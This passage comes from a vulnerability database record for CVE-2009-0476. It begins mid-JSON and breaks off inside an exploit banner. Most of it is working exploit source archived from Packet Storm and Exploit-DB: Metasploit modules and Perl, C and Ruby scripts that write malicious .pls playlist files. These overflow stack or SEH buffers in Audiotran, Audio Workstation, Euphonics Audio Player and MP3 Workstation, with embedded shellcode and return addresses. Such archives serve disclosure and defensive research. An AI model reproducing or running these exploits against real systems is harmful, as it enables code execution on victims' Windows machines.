{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:02", "description": "", "published": 
"2010-02-05T00:00:00", "type": "packetstorm", "title": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2010-02-05T00:00:00", "id": "PACKETSTORM:85991", "href": "https://packetstormsecurity.com/files/85991/Audiotran-1.4.1-PLS-File-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id: audiotran_pls.rb 8306 2010-01-28 21:04:01Z swtornio $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow in Audiotran 1.4.1. \nAn attacker must send the file to victim and the victim must open the file. \nAlternatively it may be possible to execute code remotely via an embedded \nPLS file within a browser, when the PLS extention is registered to Audiotran. \nThis functionality has not been tested in this module. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Sebastien Duquette', \n'dookie', \n], \n'Version' => '$Revision: 8306 $', \n'References' => \n[ \n[ 'CVE', '2009-0476'], \n[ 'OSVDB', '55424'], \n[ 'URL', 'http://www.exploit-db.com/exploits/11079' ], \n], \n'Payload' => \n{ \n'Space' => 6000, \n'BadChars' => \"\\x00\\x0a\\x3d\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows Universal', { 'Ret' => 0x10101A3E } ], #p/p/r in rsaadjd.tmp \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jan 09 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']), \n], self.class) \n \nend \n \ndef exploit \n \nsploit = rand_text_alpha_upper(1308) \nsploit << generate_seh_payload(target.ret) \nsploit << rand_text_alpha_upper(8000) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \n \nfile_create(sploit) \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/85991/audiotran_pls.rb.txt"}, {"lastseen": "2016-12-05T22:12:29", "description": "", "published": "2009-12-31T00:00:00", "type": "packetstorm", "title": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2009-12-31T00:00:00", "id": "PACKETSTORM:84553", "href": "https://packetstormsecurity.com/files/84553/Audio-Workstation-6.4.2.4.3-pls-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. \nWhen opening a malicious pls file with the Audio Workstation, \na remote attacker could overflow a buffer and execute \narbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'germaya_x', 'dookie', ], \n'Version' => '$Revision: 7828 $', \n'References' => \n[ \n[ 'CVE', '2009-0476' ], \n[ 'OSVDB', '55424' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/10353' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 4100, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n'EncoderType' => Msf::Encoder::Type::AlphanumUpper, \n'DisableNops' => 'True', \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll \n], \n'Privileged' => false, \n'DisclosureDate' => 'Dec 08 2009', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']), \n], self.class) \n \nend \n \ndef exploit \n \nsploit = rand_text_alpha_upper(1308) \nsploit << \"\\xeb\\x16\\x90\\x90\" \nsploit << [target.ret].pack('V') \nsploit << make_nops(32) \nsploit << payload.encoded \nsploit << rand_text_alpha_upper(4652 - payload.encoded.length) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(sploit) \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84553/audio_wkstn_pls.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-01T03:25:33", "description": 
"Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit. CVE-2009-0476. Local exploit for windows platform", "published": "2009-02-03T00:00:00", "type": "exploitdb", "title": "Euphonics Audio Player 1.0 - .pls Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2009-02-03T00:00:00", "id": "EDB-ID:7958", "href": "https://www.exploit-db.com/exploits/7958/", "sourceData": "#!/usr/bin/perl -w\r\n#-----------------------------------------------------------------------------\r\n# Author : h4ck3r#47\r\n# Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit\r\n# Tested in Windows Pro Sp3 (English)\r\n# Gr33tz to : str0ke , T.N.T:18 , AlpHaNiX , All arab4services.net and friends\r\n#-----------------------------------------------------------------------------\r\nmy $overflow = \"\\x41\" x 1324;\r\nmy $ret = \"\\x7B\\x46\\x86\\x7C\"; # jmp ESP from kernel32.dll in Windows pro Sp3\r\nmy $nop = \"\\x90\" x 100 ;\r\n\r\n# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/\r\nmy $shellcode 
=\r\n\"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x34\".\r\n\"\\x92\\x42\\x83\\x83\\xeb\\xfc\\xe2\\xf4\\xc8\\x7a\\x06\\x83\\x34\\x92\\xc9\\xc6\".\r\n\"\\x08\\x19\\x3e\\x86\\x4c\\x93\\xad\\x08\\x7b\\x8a\\xc9\\xdc\\x14\\x93\\xa9\\xca\".\r\n\"\\xbf\\xa6\\xc9\\x82\\xda\\xa3\\x82\\x1a\\x98\\x16\\x82\\xf7\\x33\\x53\\x88\\x8e\".\r\n\"\\x35\\x50\\xa9\\x77\\x0f\\xc6\\x66\\x87\\x41\\x77\\xc9\\xdc\\x10\\x93\\xa9\\xe5\".\r\n\"\\xbf\\x9e\\x09\\x08\\x6b\\x8e\\x43\\x68\\xbf\\x8e\\xc9\\x82\\xdf\\x1b\\x1e\\xa7\".\r\n\"\\x30\\x51\\x73\\x43\\x50\\x19\\x02\\xb3\\xb1\\x52\\x3a\\x8f\\xbf\\xd2\\x4e\\x08\".\r\n\"\\x44\\x8e\\xef\\x08\\x5c\\x9a\\xa9\\x8a\\xbf\\x12\\xf2\\x83\\x34\\x92\\xc9\\xeb\".\r\n\"\\x08\\xcd\\x73\\x75\\x54\\xc4\\xcb\\x7b\\xb7\\x52\\x39\\xd3\\x5c\\x62\\xc8\\x87\".\r\n\"\\x6b\\xfa\\xda\\x7d\\xbe\\x9c\\x15\\x7c\\xd3\\xf1\\x23\\xef\\x57\\xbc\\x27\\xfb\".\r\n\"\\x51\\x92\\x42\\x83\";\r\n\r\nmy $file=\"hx.pls\";\r\n\r\n$exploit = $overflow.$ret.$nop.$shellcode;\r\nopen(my $FILE, \">>$file\") or die \"Cannot open $file: $!\";\r\nprint $FILE $exploit ;\r\nclose($FILE);\r\nprint \"Done \\n\";\r\n\r\n# milw0rm.com [2009-02-03]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7958/"}, {"lastseen": "2016-02-01T04:27:17", "description": "Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit. CVE-2009-0476. 
Local exploit for windows platform", "published": "2009-02-04T00:00:00", "type": "exploitdb", "title": "Euphonics Audio Player 1.0 - .pls Universal Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2009-02-04T00:00:00", "id": "EDB-ID:7973", "href": "https://www.exploit-db.com/exploits/7973/", "sourceData": "#!/usr/bin/perl -w\n#-----------------------------------------------------------------------------\n# Author : Houssamix\n\n# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit\n# Gr33tz to : str0ke , real-power.net , Legend-spy - stack \n\n# thx to h4ck3r#47 for the fisrt exploit http://milw0rm.com/exploits/7958\n# just the ret adress is changed for make the exploit universal\n\n#-----------------------------------------------------------------------------\nmy $overflow = \"\\x41\" x 1324;\nmy $ret = \"\\xCB\\xA3\\x0F\\x10\"; # jmp esp from AdjMmsEng.dll <= universal adress\nmy $nop = \"\\x90\" x 100 ;\n\n# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/\nmy $shellcode 
=\n\"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x34\".\n\"\\x92\\x42\\x83\\x83\\xeb\\xfc\\xe2\\xf4\\xc8\\x7a\\x06\\x83\\x34\\x92\\xc9\\xc6\".\n\"\\x08\\x19\\x3e\\x86\\x4c\\x93\\xad\\x08\\x7b\\x8a\\xc9\\xdc\\x14\\x93\\xa9\\xca\".\n\"\\xbf\\xa6\\xc9\\x82\\xda\\xa3\\x82\\x1a\\x98\\x16\\x82\\xf7\\x33\\x53\\x88\\x8e\".\n\"\\x35\\x50\\xa9\\x77\\x0f\\xc6\\x66\\x87\\x41\\x77\\xc9\\xdc\\x10\\x93\\xa9\\xe5\".\n\"\\xbf\\x9e\\x09\\x08\\x6b\\x8e\\x43\\x68\\xbf\\x8e\\xc9\\x82\\xdf\\x1b\\x1e\\xa7\".\n\"\\x30\\x51\\x73\\x43\\x50\\x19\\x02\\xb3\\xb1\\x52\\x3a\\x8f\\xbf\\xd2\\x4e\\x08\".\n\"\\x44\\x8e\\xef\\x08\\x5c\\x9a\\xa9\\x8a\\xbf\\x12\\xf2\\x83\\x34\\x92\\xc9\\xeb\".\n\"\\x08\\xcd\\x73\\x75\\x54\\xc4\\xcb\\x7b\\xb7\\x52\\x39\\xd3\\x5c\\x62\\xc8\\x87\".\n\"\\x6b\\xfa\\xda\\x7d\\xbe\\x9c\\x15\\x7c\\xd3\\xf1\\x23\\xef\\x57\\xbc\\x27\\xfb\".\n\"\\x51\\x92\\x42\\x83\";\n\nmy $file=\"hsmx.pls\";\n\n$exploit = $overflow.$ret.$nop.$shellcode;\nopen(my $FILE, \">>$file\") or die \"Cannot open $file: $!\";\nprint $FILE $exploit ;\nclose($FILE);\nprint \"Done \\n\";\n\n# milw0rm.com [2009-02-04]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7973/"}, {"lastseen": "2016-02-01T04:27:25", "description": "Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3). CVE-2009-0476. 
Local exploit for windows platform", "published": "2009-02-04T00:00:00", "type": "exploitdb", "title": "Euphonics Audio Player 1.0 - .pls Local Buffer Overflow Exploit xp/sp3", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2009-02-04T00:00:00", "id": "EDB-ID:7974", "href": "https://www.exploit-db.com/exploits/7974/", "sourceData": "#include <stdio.h>\n#include <windows.h>\n#include <string.h>\n#define overflow 1324\n#define NOP 0x90\n#define pls \"Eye.pls\"\n\nint main (int argc,char **argv)\n{\nchar winsp3[] = \"\\x7B\\x46\\x86\\x7C\";\nchar buffer[overflow];\nFILE *Player;\n\nunsigned char shellcode[] =\n\"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xec\"\n\"\\x96\\x7d\\xb2\\x83\\xeb\\xfc\\xe2\\xf4\\x10\\x7e\\x39\\xb2\\xec\\x96\\xf6\\xf7\"\n\"\\xd0\\x1d\\x01\\xb7\\x94\\x97\\x92\\x39\\xa3\\x8e\\xf6\\xed\\xcc\\x97\\x96\\xfb\"\n\"\\x67\\xa2\\xf6\\xb3\\x02\\xa7\\xbd\\x2b\\x40\\x12\\xbd\\xc6\\xeb\\x57\\xb7\\xbf\"\n\"\\xed\\x54\\x96\\x46\\xd7\\xc2\\x59\\xb6\\x99\\x73\\xf6\\xed\\xc8\\x97\\x96\\xd4\"\n\"\\x67\\x9a\\x36\\x39\\xb3\\x8a\\x7c\\x59\\x67\\x8a\\xf6\\xb3\\x07\\x1f\\x21\\x96\"\n\"\\xe8\\x55\\x4c\\x72\\x88\\x1d\\x3d\\x82\\x69\\x56\\x05\\xbe\\x67\\xd6\\x71\\x39\"\n\"\\x9c\\x8a\\xd0\\x39\\x84\\x9e\\x96\\xbb\\x67\\x16\\xcd\\xb2\\xec\\x96\\xf6\\xda\"\n\"\\xd0\\xc9\\x4c\\x44\\x8c\\xc0\\xf4\\x4a\\x6f\\x56\\x06\\xe2\\x84\\x66\\xf7\\xb6\"\n\"\\xb3\\xfe\\xe5\\x4c\\x66\\x98\\x2a\\x4d\\x0b\\xf5\\x1c\\xde\\x8f\\xb8\\x18\\xca\"\n\"\\x89\\x96\\x7d\\xb2\";\n\nprintf(\"\\n******************************************\");\nprintf(\"\\n* THIS BUG ORGINAL DISCOVER BY h4ck3r#47 *\");\nprintf(\"\\n* THIS BUG C0DED BY SINGLE EYE *\");\nprintf(\"\\n* SPECIAL THANKS TO STR0KE *\");\nprintf(\"\\n******************************************\");\nmemset(buffer,NOP,overflow);\nmemcpy(buffer,shellcode,sizeof(shellcode)-1);\nbuffer[overflow] = 0;\nPlayer = fopen(pls,\"w+\");\nfwrite(Player,sizeof(unsigned 
char),sizeof(buffer),Player);\nfclose(Player);\nprintf(\"\\n DOne Poc !!\");\nreturn 0;\n}\n\n// milw0rm.com [2009-02-04]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7974/"}, {"lastseen": "2016-02-01T20:57:35", "description": "MP3 Workstation Version 9.2.1.1.2 SEH exploit. CVE-2009-0476. Local exploit for windows platform", "published": "2010-09-15T00:00:00", "type": "exploitdb", "title": "MP3 Workstation 9.2.1.1.2 - SEH Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2010-09-15T00:00:00", "id": "EDB-ID:15013", "href": "https://www.exploit-db.com/exploits/15013/", "sourceData": "#MP3 Workstation Version 9.2.1.1.2 SEH exploit\r\n#Author Sanjeev Gupta san.gupta86[at]gmail.com\r\n#Download Vulnerable application from http://www.e-soft.co.uk/MP3%20Workstation.htm\r\n#Vulnerable version MP3 Workstation Version 9.2.1.1.2\r\n#Tested on XP SP2\r\n#Greets Puneet Jain\r\n\r\n\r\n\r\nmy $head = \"\\x5B\\x70\\x6C\\x61\\x79\\x6C\\x69\\x73\\x74\\x5D\\x0D\\x0A\\x46\\x69\\x6C\\x65\\x31\\x3D\";\r\nmy $fuck = \"\\x41\" x 1940;\r\nmy $nseh = \"\\xeb\\x06\\x90\\x90\"; # short jump\r\nmy $seh = pack('V',0x735275CB); #0x735275CB msvbvm60.dll p/p/r \r\n\r\nmy $slide = \"\\x90\" x 12;\r\nmy $code = 
\r\n\"\\xDB\\xDF\\xD9\\x74\\x24\\xF4\\x58\\x2B\\xC9\\xB1\\x33\\xBA\".\r\n\"\\x4C\\xA8\\x75\\x76\\x83\\xC0\\x04\\x31\\x50\\x13\\x03\\x1C\\xBB\\x97\\x83\\x60\".\r\n\"\\x53\\xDE\\x6C\\x98\\xA4\\x81\\xE5\\x7D\\x95\\x93\\x92\\xF6\\x84\\x23\\xD0\\x5A\".\r\n\"\\x25\\xCF\\xB4\\x4E\\xBE\\xBD\\x10\\x61\\x77\\x0B\\x47\\x4C\\x88\\xBD\\x47\\x02\".\r\n\"\\x4A\\xDF\\x3B\\x58\\x9F\\x3F\\x05\\x93\\xD2\\x3E\\x42\\xC9\\x1D\\x12\\x1B\\x86\".\r\n\"\\x8C\\x83\\x28\\xDA\\x0C\\xA5\\xFE\\x51\\x2C\\xDD\\x7B\\xA5\\xD9\\x57\\x85\\xF5\".\r\n\"\\x72\\xE3\\xCD\\xED\\xF9\\xAB\\xED\\x0C\\x2D\\xA8\\xD2\\x47\\x5A\\x1B\\xA0\\x56\".\r\n\"\\x8A\\x55\\x49\\x69\\xF2\\x3A\\x74\\x46\\xFF\\x43\\xB0\\x60\\xE0\\x31\\xCA\\x93\".\r\n\"\\x9D\\x41\\x09\\xEE\\x79\\xC7\\x8C\\x48\\x09\\x7F\\x75\\x69\\xDE\\xE6\\xFE\\x65\".\r\n\"\\xAB\\x6D\\x58\\x69\\x2A\\xA1\\xD2\\x95\\xA7\\x44\\x35\\x1C\\xF3\\x62\\x91\\x45\".\r\n\"\\xA7\\x0B\\x80\\x23\\x06\\x33\\xD2\\x8B\\xF7\\x91\\x98\\x39\\xE3\\xA0\\xC2\\x57\".\r\n\"\\xF2\\x21\\x79\\x1E\\xF4\\x39\\x82\\x30\\x9D\\x08\\x09\\xDF\\xDA\\x94\\xD8\\xA4\".\r\n\"\\x05\\x77\\xC9\\xD0\\xAD\\x2E\\x98\\x59\\xB0\\xD0\\x76\\x9D\\xCD\\x52\\x73\\x5D\".\r\n\"\\x2A\\x4A\\xF6\\x58\\x76\\xCC\\xEA\\x10\\xE7\\xB9\\x0C\\x87\\x08\\xE8\\x6E\\x46\".\r\n\"\\x9B\\x70\\x5F\\xED\\x1B\\x12\\x9F\";\r\n\r\nmy $buf = \"\\x90\" x 2805;\r\n\r\n\r\n\r\nmy $file = \"POC.pls\";\r\nopen ($File,\">$file\");\r\nprint $File $head.$fuck.$nseh.$seh.$slide.$code.$buf;\r\nclose($File);\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15013/"}, {"lastseen": "2016-02-02T06:06:59", "description": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow. CVE-2009-0476. 
Local exploit for windows platform", "published": "2010-01-28T00:00:00", "type": "exploitdb", "title": "Audiotran 1.4.1 PLS File Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2010-01-28T00:00:00", "id": "EDB-ID:16626", "href": "https://www.exploit-db.com/exploits/16626/", "sourceData": "##\r\n# $Id: audiotran_pls.rb 8306 2010-01-28 21:04:01Z swtornio $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in Audiotran 1.4.1.\r\n\t\t\t\tAn attacker must send the file to victim and the victim must open the file.\r\n\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\r\n\t\t\t\tPLS file within a browser, when the PLS extention is registered to Audiotran.\r\n\t\t\t\tThis functionality has not been tested in this module.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' \t =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Sebastien Duquette',\r\n\t\t\t\t\t'dookie',\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 8306 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0476'],\r\n\t\t\t\t\t[ 'OSVDB', '55424'],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/11079' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 6000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x3d\",\r\n\t\t\t\t\t'StackAdjustment' => 
-3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows Universal', { 'Ret' => 0x10101A3E } ], #p/p/r in rsaadjd.tmp\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jan 09 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),\r\n\t\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tsploit = rand_text_alpha_upper(1308)\r\n\t\tsploit << generate_seh_payload(target.ret)\r\n\t\tsploit << rand_text_alpha_upper(8000)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n\t\tfile_create(sploit)\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16626/"}, {"lastseen": "2016-02-01T12:19:44", "description": "Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH). CVE-2009-0476. 
Local exploit for windows platform", "published": "2009-09-24T00:00:00", "type": "exploitdb", "title": "Audio Workstation.pls Local Buffer Overflow Exploit SEH", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2009-09-24T00:00:00", "id": "EDB-ID:10353", "href": "https://www.exploit-db.com/exploits/10353/", "sourceData": "#!/usr/bin/perl\r\n=gnk\r\n==============================================================================\r\n _ _ _ _ _ _ \r\n / \\ | | | | / \\ | | | |\r\n / _ \\ | | | | / _ \\ | |_| |\r\n / ___ \\ | |___ | |___ / ___ \\ | _ |\r\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\r\n \r\n==============================================================================\r\n Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)\r\n==============================================================================\r\n\t[�] Exploited by:.......[ germaya_x ].....................\r\n [�] Script:.............[ Audio Workstation ].....................\r\n [�] version:............[ 6.4.2.4.0 ]\r\n\t[�] Today:..............[ 24/09/2009 ].....................\r\n [�] platform............[ Windows ].....................\r\n [�] tested on:..........[ Windows XP SP2 ].....................\r\n [�] greetz:.............[ his0k4/D3v!LFUCK3R ].....................\r\n==============================================================================\r\n\r\n\r\n\t\r\n=cut\r\n##############################################################################\r\nmy 
$shellcode=\r\n\"\\x89\\xe1\\xd9\\xee\\xd9\\x71\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\".\r\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\".\r\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\".\r\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\".\r\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a\".\r\n\"\\x48\\x47\\x34\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x51\\x55\\x47\".\r\n\"\\x4c\\x4c\\x4b\\x43\\x4c\\x45\\x55\\x42\\x58\\x45\\x51\\x4a\\x4f\\x4c\".\r\n\"\\x4b\\x50\\x4f\\x45\\x48\\x4c\\x4b\\x51\\x4f\\x51\\x30\\x43\\x31\\x4a\".\r\n\"\\x4b\\x51\\x59\\x4c\\x4b\\x50\\x34\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x46\".\r\n\"\\x51\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4d\\x54\\x49\\x50\\x42\\x54\\x45\".\r\n\"\\x57\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x48\\x42\\x4a\\x4b\\x4c\".\r\n\"\\x34\\x47\\x4b\\x50\\x54\\x47\\x54\\x45\\x54\\x43\\x45\\x4b\\x55\\x4c\".\r\n\"\\x4b\\x51\\x4f\\x47\\x54\\x45\\x51\\x4a\\x4b\\x45\\x36\\x4c\\x4b\\x44\".\r\n\"\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\".\r\n\"\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4c\\x49\\x51\\x4c\\x46\".\r\n\"\\x44\\x44\\x44\\x48\\x43\\x51\\x4f\\x50\\x31\\x4a\\x56\\x45\\x30\\x50\".\r\n\"\\x56\\x42\\x44\\x4c\\x4b\\x51\\x56\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\".\r\n\"\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x43\\x58\\x45\".\r\n\"\\x58\\x4b\\x39\\x4a\\x58\\x4d\\x53\\x49\\x50\\x42\\x4a\\x50\\x50\\x43\".\r\n\"\\x58\\x4a\\x50\\x4d\\x5a\\x44\\x44\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b\".\r\n\"\\x4e\\x4c\\x4a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x43\".\r\n\"\\x51\\x42\\x4c\\x42\\x43\\x43\\x30\\x41\\x41\";\r\n###################################################################\r\nmy $bof=\"\\x41\" x 1320;\r\nmy $nsh=\"\\xEB\\x09\\x90\\x90\";# Short jmp\r\nmy $seh=\"\\x5D\\x38\\x82\\x7C\";# KERNEL32.DLL\r\nmy $nop=\"\\x90\" x 
20;\r\n###################################################################\r\nopen(myfile,'>> germaya_x.pls');\r\nprint myfile $bof.$nsh.$seh.$nop.$shellcode;\r\n###################################################################", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10353/"}, {"lastseen": "2016-02-01T13:37:44", "description": "Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow. CVE-2009-0476. Local exploit for windows platform", "published": "2010-01-10T00:00:00", "type": "exploitdb", "title": "Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2010-01-10T00:00:00", "id": "EDB-ID:11079", "href": "https://www.exploit-db.com/exploits/11079/", "sourceData": "#!/usr/bin/ruby\r\n#\r\n# Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow\r\n# Date : January 9th, 2010\r\n# Author : S\u00c3\u00a9bastien Duquette\r\n# Software Link : http://www.e-soft.co.uk/Audiotran.htm\r\n# Version : 1.4.1\r\n# OS : Windows\r\n# Tested on : XP SP2/SP3 En (VMware)\r\n# Type of vuln : Stack Overflow / SEH\r\n# Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me\r\n#\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n#\r\n#\r\n#\r\n\r\nbanner =\r\n\"|------------------------------------------------------------------|\\n\" +\r\n\"| __ __ |\\n\" +\r\n\"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\" +\r\n\"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\" +\r\n\"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\" +\r\n\"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\" +\r\n\"| |\\n\" +\r\n\"| http://www.corelan.be:8800 |\\n\" +\r\n\"| |\\n\" +\r\n\"|-------------------------------------------------[ EIP 
